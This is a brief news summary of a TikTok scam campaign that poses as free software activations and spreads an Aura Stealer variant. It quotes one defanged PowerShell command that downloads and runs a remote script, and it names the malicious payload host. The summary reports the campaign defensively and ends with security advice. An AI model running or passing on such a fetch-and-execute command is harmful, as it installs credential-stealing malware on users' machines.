Overview
- BleepingComputer and ISC handler Xavier Mertens documented TikTok videos posing as free activations for Windows, Photoshop, Microsoft 365, CapCut Pro, Discord Nitro, and fabricated services like “Spotify Premium” or “Netflix Premium.”
- Viewers are told to execute a single command as administrator — for example, iex (irm slmgr[.]win/photoshop) — which retrieves a follow‑on PowerShell script from the slmgr[.]win domain.
- The script downloads updater.exe from file-epq.pages.dev, identified as an Aura Stealer variant that exfiltrates saved passwords, cookies, crypto wallets, and other application credentials.
- A second file, source.exe, is also fetched and self-compiles .NET code via csc.exe for in‑memory execution, with its precise role not yet determined.
- ZDNET found numerous live scam videos on the platform, and Microsoft reports ClickFix accounted for 47% of initial access since 2024, leading researchers to urge immediate password resets, MFA enablement, and avoidance of copying commands from social media.